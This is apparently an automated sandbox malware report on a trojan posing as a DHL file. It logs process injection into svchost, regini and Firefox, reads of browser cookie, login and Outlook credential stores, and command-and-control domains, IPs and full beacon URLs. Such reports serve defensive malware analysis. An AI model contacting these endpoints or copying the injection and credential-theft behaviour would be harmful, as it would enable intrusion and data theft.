                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A61607 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6F603 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A33616 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A33616 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtQueryInformationProcess: Direct from: 0x77392C26
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtResumeThread: Direct from: 0x77392FBC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtWriteVirtualMemory: Direct from: 0x7739490C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtCreateUserProcess: Direct from: 0x7739371C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtAllocateVirtualMemory: Direct from: 0x77392BFC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtQuerySystemInformation: Direct from: 0x77392DFC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtReadFile: Direct from: 0x77392ADC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtDelayExecution: Direct from: 0x77392DDC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtProtectVirtualMemory: Direct from: 0x77387B2E
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtWriteVirtualMemory: Direct from: 0x77392E3C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtCreateMutant: Direct from: 0x773935CC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtResumeThread: Direct from: 0x773936AC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtMapViewOfSection: Direct from: 0x77392D1C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtOpenKeyEx: Direct from: 0x77392B9C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtSetInformationProcess: Direct from: 0x77392C5C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtProtectVirtualMemory: Direct from: 0x77392F9C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtNotifyChangeKey: Direct from: 0x77393C2C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtQueryInformationToken: Direct from: 0x77392CAC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtCreateFile: Direct from: 0x77392FEC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtOpenFile: Direct from: 0x77392DCC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtTerminateThread: Direct from: 0x77392FCC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtDeviceIoControlFile: Direct from: 0x77392AEC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtAllocateVirtualMemory: Direct from: 0x77392BEC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtQuerySystemInformation: Direct from: 0x773948CC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtQueryVolumeInformationFile: Direct from: 0x77392F2C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtAllocateVirtualMemory: Direct from: 0x773948EC
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtOpenSection: Direct from: 0x77392E0C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtAllocateVirtualMemory: Direct from: 0x77393C9C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtSetInformationThread: Direct from: 0x773863F9
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtClose: Direct from: 0x77392B6C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtSetInformationThread: Direct from: 0x77392B4C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtReadVirtualMemory: Direct from: 0x77392E8C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtCreateKey: Direct from: 0x77392C6C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | NtQueryAttributesFile: Direct from: 0x77392E6C
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: NULL target: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: NULL target: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe | Thread register set: target process: unknown
                Source: C:\Windows\SysWOW64\regini.exe | Thread APC queued: target process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3090008
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_734825510.exe"
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: RsbLJIqaDYs.exe, 00000005.00000000.2575148913.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816729211.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000000.2733827779.0000000001331000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: RsbLJIqaDYs.exe, 00000005.00000000.2575148913.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816729211.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000000.2733827779.0000000001331000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: RsbLJIqaDYs.exe, 00000005.00000000.2575148913.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816729211.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000000.2733827779.0000000001331000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: RsbLJIqaDYs.exe, 00000005.00000000.2575148913.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816729211.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000000.2733827779.0000000001331000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\regini.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (number before a technique = count of matching signatures)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 412 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 31 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1570251 | Sample: DHL_734825510.exe | Start date: 06/12/2024 | Architecture: WINDOWS | Score: 100

                • Start
                  DNS/IP: www.egyshare.xyz; www.egldfi.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
                  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 3 other signatures
                  • DHL_734825510.exe (started)
                    Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                    • svchost.exe (started)
                      Signatures: Maps a DLL or memory area into another process
                      • RsbLJIqaDYs.exe (injected)
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                        • regini.exe (started)
                          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          • RsbLJIqaDYs.exe (injected)
                            DNS/IP: bloodbalancecaps.shop 108.179.253.197 ports 50022, 50023, 50024 (UNIFIEDLAYER-AS-1US, United States); samundri.online 84.32.84.32 ports 49721, 49722, 49723 (NTT-LT-ASLT, Lithuania); 7 other IPs or domains
                            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                          • firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                DHL_734825510.exe | 42% | ReversingLabs | Win32.Trojan.AutoitInject |
                DHL_734825510.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://www.dating-apps-az-dn5.xyz/tskk/?BHptZ6F=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktlw8l2JH1Fe3FVr0kJJ2WjNY2yZGKR8=&RZ=0nkpmZbx9Z4P2 | 0% | Avira URL Cloud | safe |
                http://www.samundri.online/3ifu/?BHptZ6F=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtR7263FvFtQ21l4S/sR8VHVbXOTd4oM=&RZ=0nkpmZbx9Z4P2 | 0% | Avira URL Cloud | safe |
                http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6 | 0% | Avira URL Cloud | safe |
                http://www.appsolucao.shop/8mlm/ | 100% | Avira URL Cloud | malware |
                http://www.egyshare.xyz/440l/?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2 | 0% | Avira URL Cloud | safe |
                http://www.t19yd.top/sa1b/?BHptZ6F=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/tmXBuLbW2sUc5PcpWY1XILnhN44V5I=&RZ=0nkpmZbx9Z4P2 | 0% | Avira URL Cloud | safe |
                http://www.egyshare.xyz/440l/ | 0% | Avira URL Cloud | safe |
                http://www.ana-silverco.shop/ez1t/ | 0% | Avira URL Cloud | safe |
                http://www.bloodbalancecaps.shop/qimy/ | 0% | Avira URL Cloud | safe |
                http://www.atendefacil.info/gua3/?RZ=0nkpmZbx9Z4P2&BHptZ6F=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE3ew6u8Wba+OVKdJMXKWWGbfqYbjt0U= | 0% | Avira URL Cloud | safe |
                http://www.sitioseguro.blog/k4tn/ | 0% | Avira URL Cloud | safe |
                http://www.happyjam.life/4ii9/ | 0% | Avira URL Cloud | safe |
                http://www.sitioseguro.blog/k4tn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0DDan+QLtyBM3L4kv6zOvH8nY/xHjUE= | 0% | Avira URL Cloud | safe |
                http://www.happyjam.life/4ii9/?RZ=0nkpmZbx9Z4P2&BHptZ6F=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74R/EcNhRi8s6fgxoYqpZFSK7yfL6tiw= | 0% | Avira URL Cloud | safe |
                http://www.whisperart.net/27s6/ | 0% | Avira URL Cloud | safe |
                http://www.appsolucao.shop/8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2 | 100% | Avira URL Cloud | malware |
                http://www.ana-silverco.shop/ez1t/?BHptZ6F=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS4neSxI29SjRMg4iVPNQf+tma6zkIeo=&RZ=0nkpmZbx9Z4P2 | 0% | Avira URL Cloud | safe |
                http://www.bloodbalancecaps.shop | 0% | Avira URL Cloud | safe |
                http://www.samundri.online/3ifu/ | 0% | Avira URL Cloud | safe |
                http://www.whisperart.net/27s6/?RZ=0nkpmZbx9Z4P2&BHptZ6F=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrOYQcOVU79uPxUHt14iAAYzPN76r48s= | 0% | Avira URL Cloud | safe |
                http://www.atendefacil.info/gua3/ | 0% | Avira URL Cloud | safe |
                http://www.t19yd.top/sa1b/ | 0% | Avira URL Cloud | safe |
                http://www.bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ= | 0% | Avira URL Cloud | safe |
                http://www.remedies.pro/8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU= | 0% | Avira URL Cloud | safe |
                http://www.dating-apps-az-dn5.xyz/tskk/ | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                www.remedies.pro | 13.248.169.48 | true | false | | high
                www.whisperart.net | 199.59.243.227 | true | true | | unknown
                www.ana-silverco.shop | 104.21.90.137 | true | false | | high
                appsolucao.shop | 84.32.84.32 | true | true | | unknown
                samundri.online | 84.32.84.32 | true | true | | unknown
                www.dating-apps-az-dn5.xyz | 199.59.243.227 | true | true | | unknown
                www.sitioseguro.blog | 172.67.162.39 | true | false | | high
                www.egyshare.xyz | 13.248.169.48 | true | true | | unknown
                www.happyjam.life | 209.74.77.107 | true | true | | unknown
                bloodbalancecaps.shop | 108.179.253.197 | true | true | | unknown
                t19yd.top | 38.47.207.164 | true | true | | unknown
                www.atendefacil.info | 208.115.225.220 | true | true | | unknown
                www.bloodbalancecaps.shop | unknown | unknown | true | | unknown
                www.samundri.online | unknown | unknown | true | | unknown
                www.egldfi.xyz | unknown | unknown | true | | unknown
                www.t19yd.top | unknown | unknown | true | | unknown
                www.uynline.shop | unknown | unknown | true | | unknown
                www.betmatchx.online | unknown | unknown | true | | unknown
                www.appsolucao.shop | unknown | unknown | true | | unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.samundri.online/3ifu/?BHptZ6F=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtR7263FvFtQ21l4S/sR8VHVbXOTd4oM=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.egyshare.xyz/440l/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.appsolucao.shop/8mlm/true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.dating-apps-az-dn5.xyz/tskk/?BHptZ6F=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktlw8l2JH1Fe3FVr0kJJ2WjNY2yZGKR8=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.ana-silverco.shop/ez1t/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.egyshare.xyz/440l/?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.t19yd.top/sa1b/?BHptZ6F=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/tmXBuLbW2sUc5PcpWY1XILnhN44V5I=&RZ=0nkpmZbx9Z4P2true
